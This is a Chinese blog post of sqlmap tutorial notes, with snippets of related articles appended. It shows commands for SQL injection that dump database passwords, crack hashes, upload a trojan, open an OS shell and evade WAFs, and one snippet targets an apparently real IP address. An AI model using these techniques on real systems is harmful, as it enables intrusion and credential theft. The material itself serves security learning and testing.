SQLMAP

最新推荐文章于 2024-05-25 15:57:54 发布
最新推荐文章于 2024-05-25 15:57:54 发布
阅读量312 收藏 1
点赞数
分类专栏: 注入 白帽子 文章标签: 网安 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44790964/article/details/102661939
版权

SQLMAP介绍
在这里插入图片描述当然也可以过一些waf
sqlmap安装
在这里插入图片描述
基本的参数
在这里插入图片描述–is-dba
基本的还是
sqlmap.py -u"测试的网址"
current就是当前的
在这里插入图片描述时间延迟类型
在这里插入图片描述测得是union联合查询类型的
在这里插入图片描述这个是sqlmap跑出来的一个
第一行说的是在id参数下存在的注入
第一个 type是bool盲注
第二个 时间延迟盲注
第三个 union联合查询
在这里插入图片描述这些信息是 mysql的数据库
操作系统是 win2003或者是xp
以及php脚本版本 和mysql的版本
sqlmap.py -u"测试的网址" --is-dba(看数据库连接的到底是什么权限)
(如果access的数据库就没有必要执行这个命令 因为他是一个文件存在的)

在这里插入图片描述这个true代表的是当前的这个网站dba是管理员 这个权限是很大的
sqlmap.py -u"测试的网址" --dbs
看看当前数据库有哪些用户数据库
在这里插入图片描述这些都是数据库
sqlmap.py -u"测试的网址" --current-db
(看下当前我是哪些数据库)
在这里插入图片描述这是我们数据库的名称
sqlmap.py -u"测试的网址" --current-user
(连接的数据库用户名称)
在这里插入图片描述sqlmap.py -u"测试的网址" --users
(查看下除看这个用户,此数据库还有哪些用户)
在这里插入图片描述这些都是 其他的用户
然后
sqlmap.py -u"测试的网址" --passwords
(列一些这些用户的密码)
在这里插入图片描述这就是用户和他的密码
这个复制出来去md5破解一下就可以了
不能解出来的话 就要加载字典去破解
sqlmap.py -u"测试的网址" --table -D 数据库名
(数据库列表名,指定数据库名列表)
在这里插入图片描述
告诉你有13条表
在这里插入图片描述
sqlmap.py -u"测试的网址" --table -D 数据库名 --count
在这里插入图片描述
(统计下每个表里边有多少行,进行大体的统计下)
在这里插入图片描述
一般管理员的表里就1,2条的数据,可以根据这个特征来看
看些表少得,可能就是管理员的表
sqlmap.py -u"测试的网址" --colunmns -T 指定的表名 -D 数据库名
在这里插入图片描述
(指定数据库名称指定表名列列名)
在这里插入图片描述
这是跑出来的列名
sqlmap.py -u"测试的网址" --dump -C 指定列名 -T 指定的表名 -D 数据库名
在这里插入图片描述
(指定数据库名表名列名列里边的数据)
在这里插入图片描述会出现让你加载一个字典
通过你的加密方式把本地的明文加密成密文
在这里插入图片描述这样就把密文跑出来了 密码明文就是admin123

基本参数
在这里插入图片描述在这里插入图片描述
sqlmap.py -u"测试的网址" --privileges
(看当前的用户权限)
在这里插入图片描述数据库的所有权限基本都是有的
–schema是列整个系统架构的 --batch就是不提示我了 就相当于系统自动默认的yes等等
–exclude-sysdbs 把系统的数据库不列 就是系统自带的数据库

探测登级
在这里插入图片描述内容就是这样定义的
cookie就是级别是2
测http头要改成3才能测
显示调试信息
在这里插入图片描述sqlmap.py -u"测试的网址" --dbs -v 3
sqlmap.py -u"测试的网址" --tables -D xss -v 3

在这里插入图片描述
sqlmap.py -u"测试的网址" --columns -D xss -v 4
(如果想要看响应页面呢)
在这里插入图片描述一些请求包
风险登级
在这里插入图片描述
sqlmap.py -u"测试的网址" --level 3 --risk 3
(让测试的语句更全面一些)
获取目标
在这里插入图片描述 sqlmap.py -m 报的路径以及包名
(-m就是多个)
这是测试多个
在这里插入图片描述-r就是跑包
处理Google搜索结果
在这里插入图片描述用之前要挂代理
能访问谷歌在这里插入图片描述data
在这里插入图片描述在这里插入图片描述就是把后面的参数提交给前面的网址页面

–param-del
在这里插入图片描述cookie
在这里插入图片描述–referer(判断请求来源),–headers --proxy(代理)
在这里插入图片描述在这里插入图片描述时间控制
在这里插入图片描述原理就是你用工具1s访问了10次 这不可能是人在浏览 它会自动判断这是个cc攻击
所以就会waf拦截 我们要把这个每秒的访问次数调低些,这个waf就不会拦截你了
在这里插入图片描述就可以这样改下
–safe-url,–safe-freq
在这里插入图片描述不常用
-p
在这里插入图片描述–prefix --suffix
在这里插入图片描述帮助闭合

–technique
在这里插入图片描述怎么用呢
在这里插入图片描述u 指联合查询 e指显错注入 flush-session 清除缓存
(指那些方式去测试网站)
–union-cols
在这里插入图片描述sqlmap 与oracle 都是用null 来填充的
–second-order
在这里插入图片描述如果遇到了二阶注入的类型
指定它回显示从哪里开始的
–dump-all,–exclude -sysdbs
在这里插入图片描述–search -C -T -D
在这里插入图片描述主动的直接去搜索表名
在这里插入图片描述结果有两种 一个是模糊匹配 一个是完整匹配
在这里插入图片描述
1就是模糊匹配 2就是完整匹配
-udf-inject shared-lib
在这里插入图片描述-s -t
在这里插入图片描述-batch
在这里插入图片描述–flush-session
(清楚缓存)
在这里插入图片描述–output-dir
(保存路径的).
在这里插入图片描述–smart --mobile
在这里插入图片描述–identify-waf ,–check-waf
在这里插入图片描述注册表操作
在这里插入图片描述不建议改,可能会改崩
暴力破解表名

在这里插入图片描述
在这里插入图片描述暴力破解列名
在这里插入图片描述post登录框注入
在这里插入图片描述所搜框注入
在这里插入图片描述
伪静态
在这里插入图片描述延迟注入
在这里插入图片描述
base6编码
在这里插入图片描述
执行sql语句
在这里插入图片描述看下版本
在这里插入图片描述
在这里插入图片描述
读文件
into outfile 写文件
文件读写
在这里插入图片描述在这里插入图片描述用法
文件上传
在这里插入图片描述就是个上传的方式
在这里插入图片描述把自己的木马文件上传到网站的根目录下
命令执行
在这里插入图片描述记住–os-shell重要
在这里插入图片描述4个路径
依次是默认结构路径
自定义路径
加载目录列表进行爆破
暴力搜索.
在这里插入图片描述选择的第二个路径 上传文件
导出数据
在这里插入图片描述
WAF绕过
在这里插入图片描述配合msf使用
在这里插入图片描述

详解新手如何使用sqlmap对mysql数据库进行注入攻击
1匹黑马
03-08 2840
步骤1:发现注入 闲来没事儿在上瞎逛,无意中点开一个国外的博客,发现链接是以id为结尾的,于是就手工检测了一下,结果嘛…你懂的 检测页面返回不正常,明显是带入数据库查询了,并且没有WAF,老弟就只好给你上一课啦嘻嘻嘻 这里需要注意一下: mysql跟Access有些不同,mysql数据库里有很多个数据库,我们需要知道站自己的数据库,以便于得到管理的账号密码,它的结构大体是这样的: 步骤二:使用...
Sqlmap远程连接Mysql,报错(2003)
qq_34510058的博客
10-11 1789
Sqlmap远程连接mysql
sqlmap常用渗透方法
weixin_30721899的博客
09-05 664
0X001 适用场景 1.获取了Mysql数据库root账号以及密码。 2.可以访问3306端口以及数据库。 0X002 扫描获取root账号的密码 通常有下面一些方法来获取root账号的密码 (1)phpMyAdmin多线程批量破解工具,下载地址:http://www.test404.com/post-546.html http://pan.baidu.com/s/1c1LD6...
sqlmap--is-dba显示false问题
2302_77302329的博客
05-25 768
如果--is-dba仍然显示False,可以先尝试执行--os-shell命令,如果能够成功创建shell那就说明是dba权限,可能是sqlmap的显示问题,最终还是要看能不能创建shell。mysql>ALTER USER 'root'@'localhost' IDENTIFIED BY '新密码';显示就是root用户了。
SQLmap教程
Panda_Sanko的博客
03-06 2201
一、Sqlmap直连数据库:-d 服务型数据库(前提知道数据库用户名和密码) : DBMS://USER:PASSWORD@DBMS_ IP:DBMS_ PORT/DATABASE NAME 文件型数据库(前提知道数据库绝对路径): DBMS://DATABASE_ FIL EPATH (SQL ite, Microsoft Access, Firebird, etc. ) 例如: python sqlmap.py -d “myspl://admin: admin@ 192 168 21.17:3306/t
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助全研究人员或渗透测试者发现并利用站数据库的全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
Sqlmap使用手册中文版
01-13
Sqlmap是一款强大的、自动化的SQL注入工具,广泛用于渗透测试领域。它由Python编写,能够检测和利用多种类型的SQL注入漏洞,确保Web应用程序的全性。Sqlmap支持五种不同的注入模式,包括基于布尔的盲注、基于时间...
sqlmap1.6.5新版本
07-24
Sqlmap是著名的自动化SQL注入工具,它主要用于检测和利用站应用程序中的SQL注入漏洞。Sqlmap1.6.5是该工具的一个新版本,其更新可能包括性能提升、新功能添加、已知问题修复以及对更多数据库类型的兼容性增强。在...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
SQLMAP是一款开源的自动化渗透测试工具,专门用于检测和利用SQL注入漏洞。它以其高效、智能化的特点,在全领域中备受青睐。SQL注入攻击是黑客利用应用程序处理用户输入时的疏忽,将恶意的SQL代码注入到查询...
sqlmap v1.8 最新版
03-05
Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL、 Oracle、 PostgreSQL、 Microsoft SQL Server、 Microsoft Access 等主流数据库。 Sqlmap 使用 5 ...
sqlmap指令
Demerol的博客
11-24 454
常用最基础指令: -u 指定注入点 –dbs 跑库名 –tables 跑表名 –columns 跑字段名 –dump 枚举数据 (手铐警告) -D 指定库 -T 指定表 -C 指定字段 sqlmap.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C password --dump 常见指令: –random-agent 选择随机user-agents头 –delay=1 每次探测延时1秒(防止访问过快被ban) –count 查看数
【SQL注入Sqlmap使用指南(手把手保姆版)持续更新
记录并分享学习安全的知识点..
03-15 2585
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmap基础指令
weixin_52263461的博客
01-15 411
SQLMAP的常见语句 判断是否存在注入 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1" 判断当前用户下所有数据库 sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” --dbs 获取数据库的表名 sqlmap.py -u “http://127.0.0.1/sqlilabs/Less-1/index.php/?id=1’” -D my
Sqlmap 22.05.22.02
辉小鱼的博客
11-05 714
sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。
黑客工具之sqlmap装使用详解(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap sql server(3)
m0_57472099的博客
05-10 1109
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。
SQLMAP入门命令解析
kk的博客
05-27 780
sql注入常用命令解析
渗透工具-sqlmap-基本知识及使用教程
m0_59856804的博客
03-02 1716
sqlmap的详细使用教程
有关sqlmap的使用
Mike_Roger的博客
01-24 809
首先贴一段详细参数说明,相当于说明书了 sqlmap详细命令: -is-dba 当前用户权限(是否为root权限) -dbs 所有数据库 -current-db 站当前数据库 -users 所有数据库用户 -current-user 当前数据库用户 -random-agent 构造随机user-agent -passwords 数据库密码
超详细SQLMap使用攻略及技巧分享
Y525698136的博客
12-26 1927
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
SQLmap
最新发布
03-10
### SQLmap 使用教程和案例 #### 什么是SQLmap SQLmap 是一款开源的渗透测试工具,主要用于自动化检测和利用SQL注入漏洞。该工具支持多种类型的数据库,并能自动识别并利用各种形式的SQL注入漏洞。 #### 基础命令与参数设置 为了启动SQLmap并对特定URL进行基本扫描,可以使用如下命令: ```bash sqlmap -u "http://example.com/vuln.php?id=1" ``` 此命令会尝试通过GET请求来探测`http://example.com/vuln.php?id=1`是否存在SQL注入漏洞[^1]。 对于更复杂的场景,比如需要发送POST请求或者带有Cookie的情况,则可以通过增加相应选项来进行配置: ```bash sqlmap -r request.txt --data="username=admin&password=password" --cookie="PHPSESSID=value;" ``` 这里`request.txt`包含了HTTP请求的具体细节,而`--data`指定了POST提交的数据,`--cookie`则用于传递必要的Cookies[^4]。 #### 获取当前使用的数据库名称 如果已经确认存在SQL注入点,想要知道应用程序正在使用哪个具体的数据库,可执行以下指令: ```bash sqlmap -u "http://example.com/vuln.php?id=1" --current-db ``` 这条命令将会返回服务器上运行的应用程序所连接的那个具体数据库的名字。 #### 数据库信息提取流程 一旦成功验证了某个站确实有SQL注入缺陷之后,就可以进一步挖掘更多有用的信息,例如获取所有的数据库列表、表结构以及其中存储的内容等。以下是几个常用的子命令及其功能简介: - **列出所有可用的数据库** ```bash sqlmap -u "http://example.com/vuln.php?id=1" -D database_name --dbs ``` - **枚举选定数据库中的表格** ```bash sqlmap -u "http://example.com/vuln.php?id=1" -D database_name -T table_name --tables ``` - **读取指定表内的列名** ```bash sqlmap -u "http://example.com/vuln.php?id=1" -D database_name -T table_name -C column_name --columns ``` - **导出实际数据记录** ```bash sqlmap -u "http://example.com/vuln.php?id=1" -D database_name -T table_name -C column_name --dump ``` 上述每一步都可以帮助逐步深入理解目标系统的内部架构,从而更好地评估潜在的全威胁[^3]。 #### 绕过Web应用防火墙(WAF) 当遇到部署了WAF防护机制的目标站点时,可能需要借助于Tamper脚本来修改攻击载荷的形式,使其能够避开防御措施而不触发警报。例如,在某些情况下,简单的字符串替换就能有效规避过滤规则: ```bash sqlmap -u "http://example.com/vuln.php?id=1" --tamper=between.py,randomcase.py,multiplespaces.py ``` 这段代码表示同时运用三个不同的转换函数处理输入payload,增加了绕过的成功率[^2]。 #### 日志级别控制 调整日志输出可以帮助减少不必要的干扰信息量,专注于最重要的部分。默认的日志等级设为1(INFO),但如果只想看到错误级别的消息,可以这样设定: ```bash sqlmap -u "http://example.com/vuln.php?id=1" --batch --output-dir=./results --level=0 ``` 这里的`--level=0`意味着仅显示Python traceback信息、错误信息[ERROR] 和 关键信息[CRITICAL][^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值